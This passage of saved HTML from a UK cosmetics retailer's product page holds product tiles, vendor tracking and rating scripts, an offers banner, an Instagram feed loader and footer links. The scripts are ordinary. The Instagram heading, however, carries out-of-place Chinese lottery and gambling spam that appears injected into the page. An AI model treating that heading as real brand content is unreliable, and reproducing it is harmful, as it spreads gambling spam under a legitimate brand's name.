  4070. // -->
  4071. </script>
  4072. <script type="text/javascript">//<!--
  4073. /* <![CDATA[ (viewProduct-active_data.js) */
  4074. dw.ac._capture({id: "UK1001070400", type: "recommendation"});
  4075. /* ]]> */
  4076. // -->
  4077. </script>
  4078. <div class="product-tile bfx-price-product sync-done" data-itemid="UK1001070400" data-idx="null" data-cgid="null">
  4079. <span class="visually-hidden bfx-sku ">A0129800</span>
  4080. <div class="product-main-image">
  4081. <div class="product-image">
  4082. <a class="thumb-link" href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk1001070400905e.html?dwvar_UK1001070400_color=b25955&amp;cgid=" title="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15">
  4083. <img src="jpg/1001070400_b25955b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large" class="desktop-only" />
  4084. <img src="jpg/1001070400_b25955b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large" class="ipad-only" />
  4085. <img src="jpg/1001070400_b259555a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large" class="iphone-only" />
  4086. </a>
  4087. </div>
  4088. </div>
  4089. <div class="product-main-description">
  4090. <div class="product-swatches">
  4091. <ul class="swatch-list">
  4092. <li>
  4093. <a href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk10010704006100.html?dwvar_UK1001070400_color=e67a8b" class="swatch " title="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, ">
  4094. <img class="swatch-image desktop-only" src="jpg/1001070400_ce9294_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dw37d16abd/images/1001070400_ce9294.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4095. <img class="swatch-image ipad-only" src="jpg/1001070400_ce9294_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dw37d16abd/images/1001070400_ce9294.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4096. <img class="swatch-image iphone-only" src="jpg/1001070400_ce9294_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dw37d16abd/images/1001070400_ce9294.jpg?sw=135&amp;sh=136&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4097. </a>
  4098. </li>
  4099. <li>
  4100. <a href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk100107040063ba.html?dwvar_UK1001070400_color=b25955" class="swatch selected" title="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, ">
  4101. <img class="swatch-image desktop-only" src="jpg/1001070400_b25955_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dw6c3508a0/images/1001070400_b25955.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4102. <img class="swatch-image ipad-only" src="jpg/1001070400_b25955_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dw6c3508a0/images/1001070400_b25955.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4103. <img class="swatch-image iphone-only" src="jpg/1001070400_b25955_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dw6c3508a0/images/1001070400_b25955.jpg?sw=135&amp;sh=136&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4104. </a>
  4105. </li>
  4106. <li>
  4107. <a href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk10010704009593.html?dwvar_UK1001070400_color=c9948c" class="swatch " title="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, ">
  4108. <img class="swatch-image desktop-only" src="jpg/1001070400_c9948c_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dwb8503fbc/images/1001070400_c9948c.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4109. <img class="swatch-image ipad-only" src="jpg/1001070400_c9948c_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dwb8503fbc/images/1001070400_c9948c.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4110. <img class="swatch-image iphone-only" src="jpg/1001070400_c9948c_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dwb8503fbc/images/1001070400_c9948c.jpg?sw=135&amp;sh=136&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4111. </a>
  4112. </li>
  4113. <li>
  4114. <a href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk10010704001ab2.html?dwvar_UK1001070400_color=6f4d41" class="swatch " title="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, ">
  4115. <img class="swatch-image desktop-only" src="jpg/1001070400_6f4d41_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dwbb2b001b/images/1001070400_6f4d41.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4116. <img class="swatch-image ipad-only" src="jpg/1001070400_6f4d41_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dwbb2b001b/images/1001070400_6f4d41.jpg?sw=550&amp;sh=550&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4117. <img class="swatch-image iphone-only" src="jpg/1001070400_6f4d41_s.jpg" alt="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , swatch" data-thumb="{&quot;src&quot;:&quot;https://www.elizabetharden.co.uk/dw/image/v2/AAHP_PRD/on/demandware.static/-/Sites-elizabethardenuk-master-catalog/default/dwbb2b001b/images/1001070400_6f4d41.jpg?sw=135&amp;sh=136&amp;sm=fit&quot;,&quot;alt&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, , large&quot;,&quot;title&quot;:&quot;Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15, &quot;}" />
  4118. </a>
  4119. </li>
  4120. </ul>
  4121. </div>
  4122. <div class="product-name">
  4123. <a class="name-link" href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk1001070400905e.html?dwvar_UK1001070400_color=b25955&amp;cgid=" title="Eight Hour&reg; Cream Lip Protectant Stick Sheer Tint Balm SPF 15">
  4124. Eight Hour<sup>&reg;</sup> Cream Lip Protectant Stick Sheer Tint Balm SPF 15
  4125. </a>
  4126. </div>
  4127. <div class="product-short-description">
  4128. <a class="name-link" href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk1001070400905e.html?dwvar_UK1001070400_color=b25955&amp;cgid=">
  4129. Moisturises & Smooths
  4130. </a>
  4131. </div>
  4132. <span class="sku visually-hidden">A0129800</span>
  4133. <div class="product-pricing">
  4134. <span class="product-standard-price bfx-price bfx-list-price " title="Standard Price">&pound;22.00</span>
  4135. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;17.60</span>
  4136. </div>
  4137. <div class="review">
  4138. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="uk1001070400" data-bv-redirect-url="https://www.elizabetharden.co.uk/eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-UK1001070400.html?dwvar_UK1001070400_color=b25955&amp;cgid="></div>
  4139. </div>
  4140. <div class="product-button hideallsearchpage">
  4141. <a class="button simple" href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk1001070400905e.html?dwvar_UK1001070400_color=b25955&amp;cgid=" title="SHOP NOW">SHOP NOW</a>
  4142. </div>
  4143. </div>
  4144. </div>
  4145. <div class="product-button hideallpages">
  4146. <a class="button simple" href="eight-hour-cream-lip-protectant-stick-sheer-tint-balm-spf-15-uk1001070400905e.html?dwvar_UK1001070400_color=b25955&amp;cgid=" title="SHOP NOW">SHOP NOW</a>
  4147. </div>
  4148. </div>
  4149. </div>
  4150. <div class="product-tile product-tile-height">
  4151. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0127882">
  4152.  
  4153. <script type="text/javascript">//<!--
  4154. /* <![CDATA[ */
  4155. (function(){
  4156. try {
  4157. if(window.CQuotient) {
  4158. var cq_params = {};
  4159. cq_params.cookieId = window.CQuotient.getCQCookieId();
  4160. cq_params.userId = window.CQuotient.getCQUserId();
  4161. cq_params.emailId = CQuotient.getCQHashedEmail();
  4162. cq_params.loginId = CQuotient.getCQHashedLogin();
  4163. cq_params.accumulate = true;
  4164. cq_params.products = [{
  4165. id: '1001A0127882',
  4166. sku: '',
  4167. type: '',
  4168. alt_id: ''
  4169. }];
  4170. cq_params.recommenderName = '__UNDEFINED__';
  4171. cq_params.realm = "AAHP";
  4172. cq_params.siteId = "ElizabethArdenUK";
  4173. cq_params.instanceType = "prd";
  4174. cq_params.locale = window.CQuotient.locale;
  4175. cq_params.slotId = '';
  4176. cq_params.slotConfigId = '';
  4177. cq_params.slotConfigTemplate = '';
  4178. if(window.CQuotient.sendActivity)
  4179. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  4180. else
  4181. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  4182. }
  4183. } catch(err) {}
  4184. })();
  4185. /* ]]> */
  4186. // -->
  4187. </script>
  4188. <script type="text/javascript">//<!--
  4189. /* <![CDATA[ (viewProduct-active_data.js) */
  4190. dw.ac._capture({id: "1001A0127882", type: "recommendation"});
  4191. /* ]]> */
  4192. // -->
  4193. </script>
  4194. <div class="product-tile bfx-price-product sync-done" data-itemid="1001A0127882" data-idx="null" data-cgid="null">
  4195. <span class="visually-hidden bfx-sku ">A0127882</span>
  4196. <div class="product-main-image">
  4197. <div class="product-image">
  4198. <a class="thumb-link" href="advanced-ceramide-lift-and-firm-day-cream-spf-15-1001a0127882.html" title="Advanced Ceramide Lift and Firm Day Cream SPF 15">
  4199. <img src="jpg/2104-a0127779-ceramide-lift-and-firm-day-cream-spf15-1.7ozb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Ceramide Lift and Firm Day Cream SPF 15, , large" class="desktop-only" />
  4200. <img src="jpg/2104-a0127779-ceramide-lift-and-firm-day-cream-spf15-1.7ozb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Ceramide Lift and Firm Day Cream SPF 15, , large" class="ipad-only" />
  4201. <img src="jpg/2104-a0127779-ceramide-lift-and-firm-day-cream-spf15-1.7oz5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Advanced Ceramide Lift and Firm Day Cream SPF 15, , large" class="iphone-only" />
  4202. </a>
  4203. </div>
  4204. </div>
  4205. <div class="product-main-description">
  4206. <div class="product-name">
  4207. <a class="name-link" href="advanced-ceramide-lift-and-firm-day-cream-spf-15-1001a0127882.html" title="Advanced Ceramide Lift and Firm Day Cream SPF 15">
  4208. Advanced Ceramide Lift and Firm Day Cream SPF 15
  4209. </a>
  4210. </div>
  4211. <div class="product-short-description">
  4212. <a class="name-link" href="advanced-ceramide-lift-and-firm-day-cream-spf-15-1001a0127882.html">
  4213. Firms, Hydrates, Tighten Day Cream
  4214. </a>
  4215. </div>
  4216. <span class="sku visually-hidden">A0127882</span>
  4217. <div class="product-pricing">
  4218. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;68.00</span>
  4219. </div>
  4220. <div class="review">
  4221. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0127882" data-bv-redirect-url="/advanced-ceramide-lift-and-firm-day-cream-spf-15-1001A0127882.html"></div>
  4222. </div>
  4223. <div class="product-button hideallsearchpage">
  4224. <a class="button simple" href="advanced-ceramide-lift-and-firm-day-cream-spf-15-1001a0127882.html" title="SHOP NOW">SHOP NOW</a>
  4225. </div>
  4226. </div>
  4227. </div>
  4228. <div class="product-button hideallpages">
  4229. <a class="button simple" href="advanced-ceramide-lift-and-firm-day-cream-spf-15-1001a0127882.html" title="SHOP NOW">SHOP NOW</a>
  4230. </div>
  4231. </div>
  4232. </div>
  4233. </div>
  4234. </div>
  4235. <script type="text/javascript" language="javascript">
  4236. if(typeof bvProdIds != "undefined") {
  4237.    if(typeof $BV != "undefined"){
  4238.     $BV.ui( 'rr', 'inline_ratings', {
  4239.     productIds : bvProdIds,
  4240.     containerPrefix : 'BVRRInlineRating'
  4241.     });
  4242.    }else{
  4243.        setTimeout(function(){
  4244.            $BV.ui( 'rr', 'inline_ratings', {
  4245.     productIds : bvProdIds,
  4246.     containerPrefix : 'BVRRInlineRating'
  4247.        });
  4248.        }, 3000);
  4249.    }
  4250. }
  4251. </script>
  4252. <script type="text/javascript">
  4253. $(document).ready(function () {
  4254. setTimeout(function(){
  4255. $('.best-sellers-images').slick({
  4256. dots: true,
  4257. infinite: false,
  4258. speed: 300,
  4259. slidesToShow: 3,
  4260. slidesToScroll: 3,
  4261. responsive: [
  4262. {
  4263. breakpoint: 1023,
  4264. settings: {
  4265. dots: true,
  4266. infinite: false,
  4267. slidesToShow: 2,
  4268. slidesToScroll: 2
  4269. }
  4270. }
  4271. ]
  4272. });
  4273. },2000);
  4274. });
  4275. </script>
  4276. </div>
  4277. <div class="watch-video">
  4278. </div>
  4279. <div class="grand-entrance global-bottom-banner">
  4280.  
  4281. <div class="offers-banner">
  4282. <h2>Offers for you...</h2>
  4283. <p class="hide-mobile">Explore our daily offers to receive complementary gifts and more</p>
  4284. <div class="offers-listing-container">
  4285. <div class="item">
  4286. <a href="index-94.html">
  4287. <picture>
  4288. <img alt="Free Samples" src="jpg/emea_wt_8hr_cer_banner_640px.jpg" />
  4289. </picture>
  4290. <div class="item-name">
  4291. <p>FREE GIFT ON US</p>
  4292. </div>
  4293. </a>
  4294. </div>
  4295. <div class="item">
  4296. <a href="index-102.html">
  4297. <picture>
  4298. <source media="(max-width: 767px)" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwcf9ace4f/images/homepage/topbanner/HP_Offer_M_OnExcl.jpg" />
  4299. <source media="(min-width: 768px) and (max-width: 1023px)" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwa11f992a/images/homepage/topbanner/HP_Offer_T_OnExcl.jpg" />
  4300. <img alt="Gift Sets" src="jpg/hp_offer_d_onexcl.jpg" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw7f9fb811/images/homepage/topbanner/HP_Offer_D_OnExcl.jpg" />
  4301. </picture>
  4302. <div class="item-name">
  4303. <p class="hide-mobile hide-tablet">Save with Online Exclusive Sets</p>
  4304. <p class="hide-desktop ">Save with Product Sets</p>
  4305. </div>
  4306. </a>
  4307. </div>
  4308. <div class="item hide-mobile">
  4309. <a href="index-94.html">
  4310. <picture>
  4311. <img alt="Free Shipping" src="jpg/freeshippingsitebanner_hpo-m-640.jpg" />
  4312. </picture>
  4313. <div class="item-name">
  4314. <p>Free shipping with<br class="hide-mobile hide-tablet"> all orders</p>
  4315. </div>
  4316. </a>
  4317. </div>
  4318. </div>
  4319. <p class="hide-desktop hide-tablet"><a href="index-94.html">See more offers</a></p>
  4320. </div>
  4321. <style type="text/css">
  4322.    .global-bottom-banner .offers-banner a {
  4323.        margin: 0px auto;
  4324.    }
  4325.  
  4326.    .global-bottom-banner .offers-banner {
  4327.        text-align: center;
  4328.        margin: 50px auto 0;
  4329.        bottom: inherit;
  4330.        position: relative;
  4331.    }
  4332.  
  4333.    .global-bottom-banner .offers-banner h2 {
  4334.        margin-bottom: 0.5rem;
  4335.        font-size: 2.250rem;
  4336.        padding: 0;
  4337.        line-height: 1rem;
  4338.        margin: 0 0 0.625rem;
  4339.    }
  4340.  
  4341.    .global-bottom-banner .offers-banner p {
  4342.        margin: 0.938rem 0;
  4343.        font-size: 1.125rem;
  4344.        width: 100%;
  4345.    }
  4346.  
  4347.    .global-bottom-banner .offers-banner p:last-of-type {
  4348.        margin-bottom: 0;
  4349.    }
  4350.  
  4351.    .global-bottom-banner .offers-banner a:hover {
  4352.        color: #000;
  4353.    }
  4354.  
  4355.    .global-bottom-banner .offers-banner .offers-listing-container {
  4356.        display: -webkit-flex;
  4357.        display: flex;
  4358.        -webkit-flex-direction: row;
  4359.        flex-direction: row;
  4360.        text-align: left;
  4361.        margin: 50px auto 1rem;
  4362.        flex-flow: nowrap;
  4363.        align-self: flex-start;
  4364.        justify-content: center;
  4365.    }
  4366.  
  4367.    .global-bottom-banner .offers-banner .offers-listing-container .item {
  4368.        width: 26%;
  4369.        text-align: center;
  4370.        padding-bottom: 10px;
  4371.    }
  4372.  
  4373.    .global-bottom-banner .offers-banner .offers-listing-container .item .item-name p {
  4374.        text-align: center;
  4375.        font-size: 1rem;
  4376.        line-height: 1.250rem;
  4377.        margin: 1.250rem auto 0;
  4378.        text-transform: uppercase;
  4379.    }
  4380.  
  4381.    .global-bottom-banner .offers-banner .offers-listing-container .item:nth-of-type(2n) {
  4382.        margin: 0 2.5rem;
  4383.    }
  4384.  
  4385.    .global-bottom-banner .offers-banner .offers-listing-container .item:last-of-type {
  4386.        margin: 0;
  4387.    }
  4388.  
  4389.    .home-slot3 .row.top-message {
  4390.        margin-bottom: 0.5rem;
  4391.    }
  4392.  
  4393.    @media screen and (min-width: 1024px) and (max-width: 1199px) {}
  4394.  
  4395.    @media screen and (min-width: 768px) and (max-width: 1023px) {}
  4396.  
  4397.    @media screen and (max-width: 767px) {
  4398.        .global-bottom-banner .offers-banner picture>img {
  4399.            width: 100%;
  4400.            height: auto;
  4401.            line-height: 0;
  4402.            vertical-align: bottom;
  4403.        }
  4404.  
  4405.        .global-bottom-banner .offers-banner h2 {
  4406.            font-size: 1.25rem;
  4407.            line-height: 1em;
  4408.            width: 95%;
  4409.            margin: 0 auto 0.625rem;
  4410.        }
  4411.  
  4412.        .global-bottom-banner .offers-banner p {
  4413.            width: 95%;
  4414.            margin: 0px auto 0.625rem;
  4415.            font-size: 1rem;
  4416.            line-height: 1.125rem;
  4417.            font-weight: 400;
  4418.            text-decoration: underline;
  4419.        }
  4420.  
  4421.        .global-bottom-banner .offers-banner .offers-listing-container .item .item-name p {
  4422.            font-size: 0.75rem;
  4423.            line-height: 0.875rem;
  4424.        }
  4425.  
  4426.        .global-bottom-banner .offers-banner .button {
  4427.            background-color: #fff;
  4428.        }
  4429.  
  4430.        .global-bottom-banner .offers-banner .button a {
  4431.            color: #000;
  4432.        }
  4433.  
  4434.        .global-bottom-banner .offers-banner {
  4435.            margin: 1rem auto;
  4436.        }
  4437.  
  4438.        .global-bottom-banner .offers-banner .offers-listing-container {
  4439.            text-align: left;
  4440.            margin: 2rem auto 0;
  4441.            flex-flow: wrap;
  4442.            align-self: flex-start;
  4443.            justify-content: center;
  4444.        }
  4445.  
  4446.        .global-bottom-banner .offers-banner .offers-listing-container .item {
  4447.            width: 45%;
  4448.            margin: 0.625rem auto;
  4449.        }
  4450.  
  4451.        .global-bottom-banner .offers-banner .offers-listing-container .item:nth-of-type(2n) {
  4452.            margin: 0.625rem auto;
  4453.        }
  4454.  
  4455.        .global-bottom-banner .offers-banner .offers-listing-container .item:last-of-type {
  4456.            margin: 0.625rem auto;
  4457.        }
  4458.  
  4459.        .global-bottom-banner .offers-banner .offers-listing-container .item p {
  4460.            margin-bottom: 1.250rem;
  4461.            text-decoration: none;
  4462.        }
  4463.    }
  4464. </style>
  4465. </div>
  4466. <div class="liz-images">
  4467. <div class="html-slot-container">
  4468.  
  4469. <h2>澳洲幸运10开奖记录查询,168澳洲幸运10开奖号码结果官网计划,澳洲10开奖走势app下载  @ElizabethArden</h2>
  4470. <script>
  4471. $( document ).ready(function() {
  4472. // Instafeed Replacement
  4473. var instagramAPI = "https://learnmore.elizabetharden.com/ws/instagram/",
  4474. d = new Date();
  4475. $.getJSON( instagramAPI, {
  4476. datetime: d.getTime(),
  4477. source: "db",
  4478. limit: 6,
  4479. username: "elizabetharden"
  4480. })
  4481. .done(function( data ) {
  4482. $.each( data.data, function( i, item ) {
  4483. var thisBlock = '<a href="' + item.permalink + '" target="_blank"><img src="' + ( item.thumbnail_url ? item.thumbnail_url : item.media_url ) + '.webp"  height="293" width="293" alt=" Elizabeth Arden Instagram" /></a>';
  4484. $(thisBlock).appendTo( "#instafeed" );
  4485. if ( i === 6 ) {
  4486. return false;
  4487. }
  4488. });
  4489. });
  4490. if($(window).width() < 1023){
  4491. if($(window).width() < 767){
  4492. $("#instafeed").find("img").css({"width":150,"height":150});
  4493. }
  4494. }
  4495. });
  4496. </script>
  4497. <div id="instafeed"></div>
  4498. <style>
  4499. .liz-images h2 {
  4500. text-align: center;
  4501. color: #000000;
  4502. font-size: 36px;
  4503. font-weight: normal;
  4504. margin-bottom: 17px;
  4505. margin-top: 3%;
  4506. font-family: "akzidenz-grotesk-extended";
  4507. }
  4508. #instafeed img {
  4509.     opacity: 1;
  4510.    transition: opacity .40s ease-in-out;
  4511.     -webkit-transition: opacity .40s ease-in-out;
  4512.     -moz-transition: opacity .40s ease-in-out;
  4513.     -o-transition: opacity .40s ease-in-out;
  4514. }
  4515. #instafeed .slick-list{padding-bottom: 20px;}
  4516. #instafeed img:hover {
  4517.     opacity: 0.75;
  4518. }
  4519. @media screen and (max-width: 767px) {
  4520. .liz-images h2{
  4521. font-size: 20px;
  4522. }
  4523. }
  4524. </style>
  4525.  
  4526. </div>
  4527. </div>
  4528. <div class="watch-video-bottom">
  4529. </div>
  4530. <div id="browser-check">
  4531. <noscript>
  4532. <div class="browser-compatibility-alert">
  4533. <i class="fa fa-exclamation-triangle fa-2x pull-left"></i>
  4534. <p class="browser-error">Your browser's Javascript functionality is turned off. Please turn it on so that you can experience the full capabilities of this site.</p>
  4535. </div>
  4536. </noscript>
  4537. </div>
  4538. <div class="browsercontainer hide">
  4539. <div class="browserversion">
  4540. Your browser is out of date. For the best and most secure experience in our catalog, Please update <a href="https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads" target="_blank">your browser</a>.
  4541. </div>
  4542. </div>
  4543. </div>
  4544. <input type="hidden" id="march-on-page-clicks" value="1" />
  4545. <div id="footer">
  4546. <footer role="contentinfo">
  4547. <div class="footer-container">
  4548. <input type="hidden" id="delayWelcomePopup" value="5000.0" class="delayWelcomePopup" />
  4549. <div class="emailsignup">
  4550. <div class="footer-itemsignup">
  4551. <div class="h3tag">Sign up for emails, special offers and your exclusive welcome discount</div>
  4552. <div id="email-alert-signup" class="email-subscribefooter">
  4553. <input type="text" aria-label="Sign up for special offers" id="email-alert-address" class="input-text email email-alert-address required" aria-placeholder="Enter email address" placeholder="Enter email address" value name="dwfrm_emailsubscribe_email">
  4554. <input type="hidden" id="emailsouceid" name="dwfrm_emailsubscribe_emailSource" value="Website - Footer Signup Page" class="emailsouceid" />
  4555. <input type="submit" name="home-email" value="Submit" title="Submit" class="emailalertbutton" />
  4556. </div>
  4557. </div>
  4558. <div class="emailsignup_success">
  4559. <span>Thank You &amp; Welcome!</span>
  4560. <span class="secondmsg">Your inbox just got more beautiful.</span>
  4561. <div class="shopping">
  4562. <input type="submit" name="footer-shopping" value="Start Shopping" title="Start Shopping" class="footer-startshopping" />
  4563. </div>
  4564. </div>
  4565. </div>
  4566. </div>
  4567. <div class="footer-containerlinks">
  4568. <div class="footerlinks">
  4569. <div class="footer-item footer-about">
  4570. <div class="content-asset">
  4571. <div class="footer-items">ABOUT US</div>
  4572. <ul class="menu-footer menu pipe">
  4573. <li><a href="our-story.html" title="Elizabeth Arden Story">Elizabeth Arden Story</a></li>
  4574. <li><a href="index-101.html" title="Find a Store" class="store-loc-com">Find a Store</a></li>
  4575. <li><a href="refer-a-friend.html" title=">Refer a friend">Refer-a-Friend Programme</a></li>
  4576. </ul>
  4577.  
  4578. </div>
  4579. </div>
  4580. <div class="footer-item footer-support">
  4581. <div class="content-asset">
  4582. <div class="footer-items">ASSISTANCE</div>
  4583. <ul class="menu-footer menu pipe">
  4584. <li><a href="index-99.html" title="My Account">My Account</a></li>
  4585. <li><a href="index-103.html" title="Order Status">Order Status</a></li>
  4586. <li><a href="shipping-option-cost.html" title="Delivery Information">Delivery Information</a></li>
  4587. <li><a href="return-instruction.html" title="Returns &amp; Exchanges">Returns &amp; Exchanges</a></li>
  4588. <li><a href="student-discount.html" title="Student Discount">Student Discount</a></li>
  4589. <li><a href="key-worker-discount.html" title="Key Worker Discount">Key Worker Discount</a></li>
  4590. </ul>
  4591.  
  4592. </div>
  4593. </div>
  4594. <div class="footer-item footer-contact">
  4595. <div class="content-asset">
  4596. <div class="footer-items">CONTACT US</div>
  4597. <ul class="menu-footer menu pipe">
  4598. <div id="BeautyChat"></div>
  4599. <li><a href="faq.html" title="FAQs">FAQs</a></li>
  4600. <li><a href="contact-us.html" title="Contact Us">Contact Us</a></li>
  4601. </ul>
  4602.  
  4603. </div>
  4604. </div>
